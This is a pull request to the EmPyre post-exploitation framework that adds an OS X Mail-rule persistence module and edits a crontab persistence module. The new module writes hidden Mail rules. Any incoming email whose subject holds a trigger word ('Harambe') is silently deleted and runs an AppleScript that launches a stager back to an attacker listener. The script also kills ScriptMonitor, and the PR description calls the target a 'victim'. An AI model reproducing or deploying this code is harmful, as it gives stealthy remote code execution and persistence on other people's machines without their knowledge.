### PR TITLE
Mail Rule for persistance 

### DIFF
--- a/README.md
+++ b/README.md
@@ -44,3 +44,6 @@ The process is as follows:
 9. if tasking, server returns HMAC(AES(KEYn, tasking))
 
 10. client posts HMAC(AES(KEYn, tasking)) to /response.uri
+
+EmPyre Tracker:
+https://trello.com/b/NASrG4IW/empyre

--- a/changelog
+++ b/changelog
@@ -1,4 +1,9 @@
 ============
+08/05/2016 - RELEASE 1.3
+============
+- DC/OS, Mesos DNS, Mesos Master, Marathon, Chronos modules from BSidesLV 2016 @TweekFawkes talk.
+
+============
 07/28/2016 - RELEASE 1.2
 ============
 - Revised release revision scheme

--- a/lib/modules/persistence/multi/crontab.py
+++ b/lib/modules/persistence/multi/crontab.py
@@ -98,17 +98,17 @@ if Remove == "True":
 
 else:
     if Hourly == "True":
-        cmd = 'crontab -l | { cat; echo "0 * * * * /private/tmp/%s"; } | crontab -'
+        cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'
         print subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
         print subprocess.Popen('crontab -l', shell=True, stdout=subprocess.PIPE).stdout.read()
-        print subprocess.Popen('chmod +x /private/tmp/%s', shell=True, stdout=subprocess.PIPE).stdout.read()
+        print subprocess.Popen('chmod +x %s', shell=True, stdout=subprocess.PIPE).stdout.read()
         print "Finished"
 
     elif Hour:
-            cmd = 'crontab -l | { cat; echo "%s * * * * /private/tmp/%s"; } | crontab -'
+            cmd = 'crontab -l | { cat; echo "%s * * * * %s"; } | crontab -'
             print subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
             print subprocess.Popen('crontab -l', shell=True, stdout=subprocess.PIPE).stdout.read()
-            print subprocess.Popen('chmod +x /private/tmp/%s', shell=True, stdout=subprocess.PIPE).stdout.read()
+            print subprocess.Popen('chmod +x %s', shell=True, stdout=subprocess.PIPE).stdout.read()
             print "Finished"
 
 

--- a/lib/modules/persistence/osx/mail.py
+++ b/lib/modules/persistence/osx/mail.py
@@ -1,0 +1,209 @@
+from time import time
+from random import choice
+from string import ascii_uppercase
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'Mail',
+
+            # list of one or more authors for the module
+            'Author': ['@n00py'],
+
+            # more verbose multi-line description of the module
+            'Description': ('Installs an mail rule.'),
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : None,
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : False,
+
+            # list of any references/other comments
+            'Comments': []
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description'   :   'Agent to execute module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Listener' : {
+                'Description'   :   'Listener to use.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'LittleSnitch' : {
+                'Description'   :   'Switch. Check for the LittleSnitch process, exit the staging process if it is running. Defaults to True.',
+                'Required'      :   True,
+                'Value'         :   'True'
+            },
+            'UserAgent' : {
+                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            },
+            'RuleName' : {
+                'Description'   :   'Name of the Rule.',
+                'Required'      :   True,
+                'Value'         :   'Spam Filter'
+            },
+            'Trigger' : {
+                'Description'   :   'The trigger word.',
+                'Required'      :   True,
+                'Value'         :   'Harambe'
+            }
+        }
+#
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self):
+
+        ruleName = self.options['RuleName']['Value']
+        trigger = self.options['Trigger']['Value']
+        #plistfilename = "%s.plist" % daemonName
+        listenerName = self.options['Listener']['Value']
+        userAgent = self.options['UserAgent']['Value']
+        LittleSnitch = self.options['LittleSnitch']['Value']
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent, littlesnitch=LittleSnitch)
+        launcher = launcher.replace('"', '\\"')
+        launcher = launcher.replace('"', '\\"')
+        launcher = "do shell script \"%s\"" % (launcher)
+        hex = '0123456789ABCDEF'
+        def UUID():
+            return ''.join([choice(hex) for x in range(8)]) + "-" + ''.join(
+                [choice(hex) for x in range(4)]) + "-" + ''.join([choice(hex) for x in range(4)]) + "-" + ''.join(
+                [choice(hex) for x in range(4)]) + "-" + ''.join([choice(hex) for x in range(12)])
+        CriterionUniqueId = UUID()
+        RuleId = UUID()
+        TimeStamp = str(int(time()))[0:9]
+        SyncedRules = "/tmp/" + ''.join(choice(ascii_uppercase) for i in range(12))
+        RulesActiveState = "/tmp/" + ''.join(choice(ascii_uppercase) for i in range(12))
+        AppleScript = ''.join(choice(ascii_uppercase) for i in range(12)) + ".scpt"
+        plist = '''<?xml version="1.0" encoding="UTF-8"?>
+        <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        <plist version="1.0">
+        <array>
+        <dict>
+        		<key>AllCriteriaMustBeSatisfied</key>
+        		<string>NO</string>
+        		<key>AppleScript</key>
+        		<string>''' + AppleScript + '''</string>
+        		<key>AutoResponseType</key>
+        		<integer>0</integer>
+        		<key>Criteria</key>
+        		<array>
+        			<dict>
+        				<key>CriterionUniqueId</key>
+        				<string>''' + CriterionUniqueId + '''</string>
+        				<key>Expression</key>
+        				<string>''' + str(trigger) + '''</string>
+        				<key>Header</key>
+        				<string>Subject</string>
+        			</dict>
+        		</array>
+        		<key>Deletes</key>
+        		<string>YES</string>
+        		<key>HighlightTextUsingColor</key>
+        		<string>NO</string>
+        		<key>MarkFlagged</key>
+        		<string>NO</string>
+        		<key>MarkRead</key>
+        		<string>NO</string>
+        		<key>NotifyUser</key>
+        		<string>NO</string>
+        		<key>RuleId</key>
+        		<string>''' + RuleId + '''</string>
+        		<key>RuleName</key>
+        		<string>''' + str(ruleName) + '''</string>
+        		<key>SendNotification</key>
+        		<string>NO</string>
+        		<key>ShouldCopyMessage</key>
+        		<string>NO</string>
+        		<key>ShouldTransferMessage</key>
+        		<string>NO</string>
+        		<key>TimeStamp</key>
+        		<integer>''' + TimeStamp + '''</integer>
+        		<key>Version</key>
+        		<integer>1</integer>
+        	</dict>
+        </array>
+        </plist>'''
+        plist2 = '''<?xml version="1.0" encoding="UTF-8"?>
+        <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        <plist version="1.0">
+        <dict>
+        	<key>''' + RuleId + '''</key>
+        	<true/>
+        </dict>
+        </plist>
+        	'''
+        script = """
+import os
+home =  os.getenv("HOME")
+AppleScript = '%s'
+SyncedRules = '%s'
+RulesActiveState = '%s'
+plist = \"\"\"%s\"\"\"
+plist2 = \"\"\"%s\"\"\"
+payload = \'\'\'%s\'\'\'
+payload = payload.replace('&\"', '& ')
+payload += "kill `ps -ax | grep ScriptMonitor |grep -v grep |  awk \'{print $1}\'`"
+payload += '\"'
+script = home + "/Library/Application Scripts/com.apple.mail/" + AppleScript
+
+os.system("touch " + SyncedRules)
+with open(SyncedRules, 'w+') as f:
+    f.write(plist)
+    f.close()
+
+os.system("touch " + RulesActiveState)
+with open(RulesActiveState, 'w+') as f:
+    f.write(plist2)
+    f.close()
+
+with open(script, 'w+') as f:
+    f.write(payload)
+    f.close()
+
+if os.path.isfile(home + "/Library/Mobile Documents/com~apple~mail/Data/V3/MailData/ubiquitous_SyncedRules.plist"):
+    #If this exists, this should auto-sync immediately and overwrite any value in SyncedRules.plist
+    os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mobile\ Documents/com~apple~mail/Data/V3/MailData/ubiquitous_SyncedRules.plist")
+else:
+    #If it doesn't, here is the main file for rules that will become active on restart
+    os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mail/V3/MailData/SyncedRules.plist")
+
+os.system("/usr/libexec/PlistBuddy -c 'Merge " + RulesActiveState + "' "+ home + "/Library/Mail/V3/MailData/RulesActiveState.plist")
+os.system("rm " + SyncedRules)
+os.system("rm " + RulesActiveState)
+
+        """ % (AppleScript, SyncedRules, RulesActiveState, plist, plist2, launcher)
+        return script
+


### PR DESCRIPTION
Added a new module.  The way it works is by creating:
1. applescript stager with some extra code to kill the script monitor upon execution
2. Two plists, one for the new mail rule and one to activate it
3.  Drops these files, merges the new plists with the existing mail rules, then deletes the dropped files

When a new email comes in to the victim with the special "trigger" word it will delete the mail and execute the applescript

![screen shot 2016-09-10 at 10 18 08 am](https://cloud.githubusercontent.com/assets/14309124/18412316/38d7cbde-7740-11e6-9810-a4b811003b03.png)
![screen shot 2016-09-10 at 10 14 07 am](https://cloud.githubusercontent.com/assets/14309124/18412314/38d53216-7740-11e6-8ee9-e8e85a8823d0.png)
